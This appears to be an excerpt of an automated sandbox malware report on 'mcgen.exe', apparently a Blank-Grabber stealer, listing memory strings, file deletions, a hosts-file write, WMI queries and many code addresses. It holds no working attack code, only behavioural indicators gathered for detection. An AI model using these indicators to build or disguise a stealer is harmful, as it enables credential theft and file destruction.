Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: mcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2127861413.000002C54E191000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: mcgen.exe, 00000002.00000003.2263911677.000002C54EA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: mcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527984225.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAC8000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: mcgen.exe, 00000002.00000003.2260177026.000002C54F5E2000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F144000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2241432619.000002C54F5E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: mcgen.exe, 00000002.00000003.2263911677.000002C54EA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org#
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: mcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2279071869.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: mcgen.exe, 00000002.00000002.2529691866.000002C54F58F000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmp, mcgen.exe, 00000002.00000002.2534814877.00007FFD9409A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\mcgen.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QNCYCDFIJJ.pdf	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LSBIHQFDVT.docx	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EFOYFBOLXA.png	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EFOYFBOLXA.png	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\mcgen.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: conhost.exe	Process created: 42
Source: cmd.exe	Process created: 70

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695CED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

103_2_00007FF695CED2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695D1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

103_2_00007FF695D1B57C

Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F18BD0	0_2_00007FF6B9F18BD0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F30938	0_2_00007FF6B9F30938
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F369D4	0_2_00007FF6B9F369D4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F11000	0_2_00007FF6B9F11000
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1A34B	0_2_00007FF6B9F1A34B
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F21BC0	0_2_00007FF6B9F21BC0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F35C70	0_2_00007FF6B9F35C70
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F33C80	0_2_00007FF6B9F33C80
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F22C80	0_2_00007FF6B9F22C80
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F36488	0_2_00007FF6B9F36488
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F30938	0_2_00007FF6B9F30938
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1A4E4	0_2_00007FF6B9F1A4E4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1AD1D	0_2_00007FF6B9F1AD1D
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F28154	0_2_00007FF6B9F28154
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F219B4	0_2_00007FF6B9F219B4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F221D4	0_2_00007FF6B9F221D4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F23A14	0_2_00007FF6B9F23A14
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F2DACC	0_2_00007FF6B9F2DACC
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F2DF60	0_2_00007FF6B9F2DF60
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F39798	0_2_00007FF6B9F39798
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F217B0	0_2_00007FF6B9F217B0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F21FD0	0_2_00007FF6B9F21FD0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F28804	0_2_00007FF6B9F28804
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F19870	0_2_00007FF6B9F19870
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F318E4	0_2_00007FF6B9F318E4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F3411C	0_2_00007FF6B9F3411C
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F25DA0	0_2_00007FF6B9F25DA0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F21DC4	0_2_00007FF6B9F21DC4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F2E5E0	0_2_00007FF6B9F2E5E0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F23610	0_2_00007FF6B9F23610
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F35EEC	0_2_00007FF6B9F35EEC
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F29F10	0_2_00007FF6B9F29F10
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FF6B9F369D4	2_2_00007FF6B9F369D4
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940E92C0	2_2_00007FFD940E92C0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940F22E0	2_2_00007FFD940F22E0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940E9D10	2_2_00007FFD940E9D10
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD94154CF0	2_2_00007FFD94154CF0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD9414CFB0	2_2_00007FFD9414CFB0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD94175510	2_2_00007FFD94175510
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940D94E0	2_2_00007FFD940D94E0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940D4570	2_2_00007FFD940D4570
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD9411A5A0	2_2_00007FFD9411A5A0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD9412B640	2_2_00007FFD9412B640
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD94101630	2_2_00007FFD94101630
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940F4630	2_2_00007FFD940F4630
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940FE650	2_2_00007FFD940FE650
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD940E3660	2_2_00007FFD940E3660
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD9412E700	2_2_00007FFD9412E700
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD94130750	2_2_00007FFD94130750
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFD948A5DD0	2_2_00007FFD948A5DD0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA334155A	2_2_00007FFDA334155A
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3407A20	2_2_00007FFDA3407A20
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3341596	2_2_00007FFDA3341596
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3341618	2_2_00007FFDA3341618
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA33413DE	2_2_00007FFDA33413DE
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3341654	2_2_00007FFDA3341654
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA334116D	2_2_00007FFDA334116D
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3366030	2_2_00007FFDA3366030
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA334117C	2_2_00007FFDA334117C
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA3341546	2_2_00007FFDA3341546
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA33416FE	2_2_00007FFDA33416FE
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 2_2_00007FFDA334149C	2_2_00007FFDA334149C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF86FA	11_2_00007FFD32CF86FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF9FFB	11_2_00007FFD32CF9FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF8955	11_2_00007FFD32CF8955
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF84FA	11_2_00007FFD32CF84FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF5CFA	11_2_00007FFD32CF5CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CFB9FA	11_2_00007FFD32CFB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32DC3027	11_2_00007FFD32DC3027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D03B5A	62_2_00007FFD32D03B5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D03CFA	62_2_00007FFD32D03CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D0441D	62_2_00007FFD32D0441D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D0264D	62_2_00007FFD32D0264D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D04C3D	62_2_00007FFD32D04C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D053F2	62_2_00007FFD32D053F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D051F2	62_2_00007FFD32D051F2
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDB540	103_2_00007FF695CDB540
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD1884	103_2_00007FF695CD1884
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CD82F0	103_2_00007FF695CD82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE1180	103_2_00007FF695CE1180
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE54C0	103_2_00007FF695CE54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFAE10	103_2_00007FF695CFAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D07B24	103_2_00007FF695D07B24
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE0A2C	103_2_00007FF695CE0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CDABA0	103_2_00007FF695CDABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D12700	103_2_00007FF695D12700
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0A710	103_2_00007FF695D0A710
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D10710	103_2_00007FF695D10710
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE86C4	103_2_00007FF695CE86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D386D4	103_2_00007FF695D386D4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D27660	103_2_00007FF695D27660
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D065FC	103_2_00007FF695D065FC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2260C	103_2_00007FF695D2260C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0F59C	103_2_00007FF695D0F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CFF5B0	103_2_00007FF695CFF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CE8598	103_2_00007FF695CE8598
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D0D91C	103_2_00007FF695D0D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D00904	103_2_00007FF695D00904
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D1190C	103_2_00007FF695D1190C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D038E8	103_2_00007FF695D038E8
